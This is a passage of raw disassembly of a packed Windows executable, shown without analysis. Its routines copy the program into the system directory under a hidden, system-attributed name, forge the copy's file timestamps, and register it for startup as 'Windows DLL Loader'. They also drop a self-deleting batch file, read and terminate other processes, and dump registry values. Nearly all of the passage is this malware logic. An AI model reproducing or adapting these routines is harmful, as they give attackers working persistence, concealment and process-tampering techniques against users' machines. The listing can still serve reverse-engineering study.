; ---------------------------------------------------------------------------
loc_40649C: ; CODE XREF: sub_40637C+11C�j
jmp loc_4063EA
; ---------------------------------------------------------------------------
loc_4064A1: ; CODE XREF: sub_40637C+89�j
; sub_40637C+11E�j
push [ebp+var_1AC]
call sub_416B4C ; free
pop ecx
loc_4064AD: ; CODE XREF: sub_40637C+3B�j
push [ebp+var_1A8]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40637C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064BF proc near ; CODE XREF: sub_40A9CF+3FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4064D9
jmp short locret_406507
; ---------------------------------------------------------------------------
loc_4064D9: ; CODE XREF: sub_4064BF+16�j
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset dword_418B44
push 0
push [ebp+var_4]
push offset sub_40637C
call sub_4095A4
add esp, 10h
locret_406507: ; CODE XREF: sub_4064BF+18�j
leave
retn
sub_4064BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406509 proc near ; CODE XREF: sub_40A9CF+9C9�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_4], 0
jz short loc_40651B
cmp [ebp+arg_C], 0
jnz short loc_406520
loc_40651B: ; CODE XREF: sub_406509+A�j
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406520: ; CODE XREF: sub_406509+10�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
call sub_40A8AD
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 180h
jbe short loc_406554
mov [ebp+var_4], 180h
loc_406554: ; CODE XREF: sub_406509+42�j
mov eax, [ebp+var_4]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
push [ebp+var_8]
push 0
push 10h
call dword_417094 ; OpenProcess
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_406586
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406586: ; CODE XREF: sub_406509+6D�j
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_18]
call dword_417098 ; ReadProcessMemory
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40662F
cmp [ebp+var_14], 0
jz short loc_40662F
mov eax, [ebp+var_1C]
add eax, [ebp+var_4]
and byte ptr [eax], 0
and [ebp+var_20], 0
jmp short loc_4065C9
; ---------------------------------------------------------------------------
loc_4065C2: ; CODE XREF: sub_406509:loc_406620�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4065C9: ; CODE XREF: sub_406509+B7�j
mov eax, [ebp+var_20]
cmp eax, [ebp+var_14]
jnb short loc_406622
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 16h
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 10h
jg short loc_406620
loc_406617: ; CODE XREF: sub_406509+D4�j
; sub_406509+E2�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
mov byte ptr [eax], 2Eh
loc_406620: ; CODE XREF: sub_406509+10C�j
jmp short loc_4065C2
; ---------------------------------------------------------------------------
loc_406622: ; CODE XREF: sub_406509+C6�j
push [ebp+var_1C]
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
loc_40662F: ; CODE XREF: sub_406509+9E�j
; sub_406509+A8�j
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
push [ebp+var_18]
call dword_4170A4 ; CloseHandle
locret_406641: ; CODE XREF: sub_406509:loc_40651B�j
; sub_406509+78�j
leave
retn
sub_406509 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406643 proc near ; CODE XREF: sub_40A9CF+3D7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_406650
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406650: ; CODE XREF: sub_406643+9�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
call dword_4170E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_406669
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406669: ; CODE XREF: sub_406643+22�j
push [ebp+var_4]
push 0
push 1
call dword_417094 ; OpenProcess
mov [ebp+var_8], eax
push 0
push [ebp+var_8]
call dword_4170A0 ; TerminateProcess
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40668D: ; CODE XREF: sub_406643+B�j
; sub_406643+24�j
leave
retn
sub_406643 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40668F proc near ; CODE XREF: sub_403DF3+149�p
; sub_40A9CF+BD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4066A0
; ---------------------------------------------------------------------------
loc_406699: ; CODE XREF: sub_40668F+2A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066A0: ; CODE XREF: sub_40668F+8�j
cmp [ebp+var_4], 8
jge short loc_4066BB
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_406699
; ---------------------------------------------------------------------------
loc_4066BB: ; CODE XREF: sub_40668F+15�j
mov eax, [ebp+arg_0]
and byte ptr [eax+8], 0
and [ebp+var_4], 0
jmp short loc_4066CF
; ---------------------------------------------------------------------------
loc_4066C8: ; CODE XREF: sub_40668F+59�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066CF: ; CODE XREF: sub_40668F+37�j
cmp [ebp+var_4], 6
jge short loc_4066EA
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066C8
; ---------------------------------------------------------------------------
loc_4066EA: ; CODE XREF: sub_40668F+44�j
mov eax, [ebp+arg_4]
and byte ptr [eax+6], 0
and [ebp+var_4], 0
jmp short loc_4066FE
; ---------------------------------------------------------------------------
loc_4066F7: ; CODE XREF: sub_40668F+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066FE: ; CODE XREF: sub_40668F+66�j
cmp [ebp+var_4], 10h
jge short loc_406719
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066F7
; ---------------------------------------------------------------------------
loc_406719: ; CODE XREF: sub_40668F+73�j
mov eax, [ebp+arg_8]
and byte ptr [eax+10h], 0
leave
retn
sub_40668F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406722 proc near ; CODE XREF: sub_40A9CF+F40�p
var_424 = byte ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 424h
cmp [ebp+arg_4], 0
jnz short loc_406736
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406736: ; CODE XREF: sub_406722+D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+4]
cmp eax, 5Ch
jz short loc_406747
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406747: ; CODE XREF: sub_406722+1E�j
push 4
push offset aHkcr ; "HKCR"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_406769
mov [ebp+var_218], 80000000h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_406769: ; CODE XREF: sub_406722+39�j
push 4
push offset aHkcu ; "HKCU"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40678B
mov [ebp+var_218], 80000001h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406722+5B�j
push 4
push offset aHklm ; "HKLM"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067AD
mov [ebp+var_218], 80000002h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_406722+7D�j
push 4
push offset aHkus ; "HKUS"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067CF
mov [ebp+var_218], 80000003h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067CF: ; CODE XREF: sub_406722+9F�j
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4067D4: ; CODE XREF: sub_406722+45�j
; sub_406722+67�j ...
mov eax, [ebp+arg_4]
add eax, 5
mov [ebp+arg_4], eax
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_210], eax
jmp short loc_4067FB
; ---------------------------------------------------------------------------
loc_4067EE: ; CODE XREF: sub_406722:loc_406858�j
mov eax, [ebp+var_210]
dec eax
mov [ebp+var_210], eax
loc_4067FB: ; CODE XREF: sub_406722+CA�j
cmp [ebp+var_210], 0
jnz short loc_406809
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406809: ; CODE XREF: sub_406722+E0�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_210]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406858
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 200h
jb short loc_40683A
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40683A: ; CODE XREF: sub_406722+111�j
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40685A
; ---------------------------------------------------------------------------
loc_406858: ; CODE XREF: sub_406722+F6�j
jmp short loc_4067EE
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_406722+134�j
cmp [ebp+var_210], 200h
jb short loc_40686B
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40686B: ; CODE XREF: sub_406722+142�j
push [ebp+var_210]
push [ebp+arg_4]
lea eax, [ebp+var_418]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_210]
and [ebp+eax+var_418], 0
lea eax, [ebp+var_C]
push eax
push 1
push 0
lea eax, [ebp+var_418]
push eax
push [ebp+var_218]
call dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_4068B5
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4068B5: ; CODE XREF: sub_406722+18C�j
mov [ebp+var_8], 1000h
push [ebp+var_8]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_214], eax
lea eax, [ebp+var_8]
push eax
push [ebp+var_214]
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_20C]
push eax
push [ebp+var_C]
call dword_41700C ; RegQueryValueExA
test eax, eax
jnz loc_406A0C
cmp [ebp+var_4], 1
jz short loc_4068FF
cmp [ebp+var_4], 2
jnz short loc_406915
loc_4068FF: ; CODE XREF: sub_406722+1D5�j
push [ebp+var_214]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406915: ; CODE XREF: sub_406722+1DB�j
cmp [ebp+var_4], 4
jnz short loc_406933
mov eax, [ebp+var_214]
push dword ptr [eax]
push offset dword_418B5C
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406933: ; CODE XREF: sub_406722+1F7�j
cmp [ebp+var_4], 3
jnz loc_406A0C
push 180h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_420], eax
mov eax, [ebp+var_420]
and byte ptr [eax], 0
and [ebp+var_41C], 0
jmp short loc_40696D
; ---------------------------------------------------------------------------
loc_406960: ; CODE XREF: sub_406722+2C3�j
mov eax, [ebp+var_41C]
inc eax
mov [ebp+var_41C], eax
loc_40696D: ; CODE XREF: sub_406722+23C�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_8]
jnb short loc_4069EA
mov eax, [ebp+var_214]
add eax, [ebp+var_41C]
movzx eax, byte ptr [eax]
push eax
push offset dword_418B54
lea eax, [ebp+var_424]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
push [ebp+var_420]
call sub_416B40 ; strlen
pop ecx
add eax, 3
cmp eax, 180h
jb short loc_4069D1
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
mov eax, [ebp+var_420]
and byte ptr [eax], 0
loc_4069D1: ; CODE XREF: sub_406722+28E�j
lea eax, [ebp+var_424]
push eax
push [ebp+var_420]
call sub_416B70 ; strcat
pop ecx
pop ecx
jmp loc_406960
; ---------------------------------------------------------------------------
loc_4069EA: ; CODE XREF: sub_406722+254�j
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
push [ebp+var_420]
call sub_416B4C ; free
pop ecx
loc_406A0C: ; CODE XREF: sub_406722+1CB�j
; sub_406722+215�j
push [ebp+var_214]
call sub_416B4C ; free
pop ecx
push [ebp+var_C]
call dword_417028 ; RegCloseKey
locret_406A21: ; CODE XREF: sub_406722+F�j
; sub_406722+20�j ...
leave
retn
sub_406722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A23 proc near ; CODE XREF: sub_40D043:loc_40D18D�p
; sub_40D871:loc_40DB71�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset dword_41DCC8
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_20C]
push eax
call dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short locret_406AE5
push [ebp+var_108]
push 1
push 2
push offset dword_418DE0
call sub_416B7C ; fwrite
add esp, 10h
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406B81
pop ecx
locret_406AE5: ; CODE XREF: sub_406A23+90�j
leave
retn
sub_406A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AE7 proc near ; CODE XREF: sub_40D043+13D�p
; sub_40D871+2F3�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset dword_41DCC8
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset aRb ; "rb"
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short loc_406B7D
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_406B7F
; ---------------------------------------------------------------------------
loc_406B7D: ; CODE XREF: sub_406AE7+83�j
xor eax, eax
locret_406B7F: ; CODE XREF: sub_406AE7+94�j
leave
retn
sub_406AE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B81 proc near ; CODE XREF: sub_406A23+BC�p
; sub_406E8E+246�p
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push 104h
lea eax, [ebp+var_11C]
push eax
call dword_417040 ; GetWindowsDirectoryA
push offset dword_418DE8
lea eax, [ebp+var_11C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call dword_417048 ; GetFileTime
push [ebp+var_120]
call dword_4170A4 ; CloseHandle
push 0
push 80h
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call dword_41704C ; SetFileTime
push [ebp+var_120]
call dword_4170A4 ; CloseHandle
locret_406C4F: ; CODE XREF: sub_406B81+5A�j
; sub_406B81+A8�j
leave
retn
sub_406B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C51 proc near ; CODE XREF: sub_406E8E+133�p
; sub_406E8E+214�p ...
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_417014 ; RegCreateKeyExA
cmp [ebp+arg_0], 0
jz short loc_406CE1
push 104h
lea eax, [ebp+var_108]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
call dword_41703C ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push [ebp+arg_4]
push [ebp+var_4]
call dword_417010 ; RegSetValueExA
jmp short loc_406CED
; ---------------------------------------------------------------------------
loc_406CE1: ; CODE XREF: sub_406C51+30�j
push [ebp+arg_4]
push [ebp+var_4]
call dword_417004 ; RegDeleteValueA
loc_406CED: ; CODE XREF: sub_406C51+8E�j
push [ebp+var_4]
call dword_417028 ; RegCloseKey
leave
retn
sub_406C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CF8 proc near ; CODE XREF: sub_406D47+2B�p
; sub_406E8E+253�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
and [ebp+var_4], 0
jmp short loc_406D1D
; ---------------------------------------------------------------------------
loc_406D16: ; CODE XREF: sub_406CF8:loc_406D40�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_406D1D: ; CODE XREF: sub_406CF8+1C�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_406D42
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406D40
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+1]
mov [ebp+var_8], eax
loc_406D40: ; CODE XREF: sub_406CF8+39�j
jmp short loc_406D16
; ---------------------------------------------------------------------------
loc_406D42: ; CODE XREF: sub_406CF8+2B�j
mov eax, [ebp+var_8]
leave
retn
sub_406CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D47 proc near ; CODE XREF: sub_406E8E+9�p
; sub_407148+9�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h
lea eax, [ebp+var_108]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push eax
call sub_406CF8
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and byte ptr [eax], 0
lea eax, [ebp+var_108]
push eax
call dword_417038 ; SetCurrentDirectoryA
leave
retn
sub_406D47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D90 proc near ; CODE XREF: sub_406E8E+25A�p
; sub_407148+168�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_20], eax
and [ebp+var_1C], 0
loc_406DA8: ; CODE XREF: sub_406D90:loc_406DDF�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx+var_18], al
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnz short loc_406DDF
push offset a_bat ; ".bat"
mov eax, [ebp+var_1C]
lea eax, [ebp+eax+var_18]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_406DE1
; ---------------------------------------------------------------------------
loc_406DDF: ; CODE XREF: sub_406D90+37�j
jmp short loc_406DA8
; ---------------------------------------------------------------------------
loc_406DE1: ; CODE XREF: sub_406D90+4D�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
push 400h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_24], eax
lea eax, [ebp+var_18]
push eax
call dword_4170AC ; DeleteFileA
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_18]
push eax
call dword_417044 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_406E2B
xor eax, eax
jmp short locret_406E8C
; ---------------------------------------------------------------------------
loc_406E2B: ; CODE XREF: sub_406D90+95�j
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
push [ebp+arg_0]
push [ebp+arg_0]
push offset a@echoOffDelete ; "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"...
push [ebp+var_24]
call dword_4171E0 ; wsprintfA
add esp, 18h
and [ebp+var_4], 0
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_24]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_24]
push [ebp+var_28]
call dword_417068 ; WriteFile
push [ebp+var_28]
call dword_4170A4 ; CloseHandle
push 0
push 0
push 0
lea eax, [ebp+var_18]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0 ; ShellExecuteA
push 1
pop eax
locret_406E8C: ; CODE XREF: sub_406D90+99�j
leave
retn
sub_406D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E8E proc near ; CODE XREF: .packed:loc_4169E1�p
var_368 = dword ptr -368h
var_338 = word ptr -338h
var_324 = byte ptr -324h
var_220 = dword ptr -220h
var_21C = byte ptr -21Ch
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 368h
call sub_406D47
push 104h
lea eax, [ebp+var_324]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
and [ebp+var_14], 0
and [ebp+var_220], 0
jmp short loc_406ED1
; ---------------------------------------------------------------------------
loc_406EC4: ; CODE XREF: sub_406E8E:loc_406FF8�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_406ED1: ; CODE XREF: sub_406E8E+34�j
mov eax, [ebp+var_220]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_406FFD
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_21C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_324]
push eax
lea eax, [ebp+var_21C]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_406FF8
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
push 1
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
jmp locret_407146
; ---------------------------------------------------------------------------
loc_406FF8: ; CODE XREF: sub_406E8E+E3�j
jmp loc_406EC4
; ---------------------------------------------------------------------------
loc_406FFD: ; CODE XREF: sub_406E8E+53�j
push [ebp+var_14]
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_118]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_118]
push eax
call dword_4170AC ; DeleteFileA
loc_40707C: ; DATA XREF: .packed:0041AD4C�o
; .packed:0041AD60�o ...
push 0
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_324]
push eax
call dword_417060 ; CopyFileA
test eax, eax
jnz short loc_4070AF
push offset dword_41EBBC
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 1
call sub_406C51
add esp, 0Ch
jmp locret_407146
; ---------------------------------------------------------------------------
loc_4070AF: ; CODE XREF: sub_406E8E+206�j
push 4
lea eax, [ebp+var_118]
push eax
call dword_4170A8 ; SetFileAttributesA
push 2
lea eax, [ebp+var_118]
push eax
call dword_4170A8 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_406B81
pop ecx
lea eax, [ebp+var_324]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
push 44h
push 0
lea eax, [ebp+var_368]
push eax
call sub_416B6A ; memset
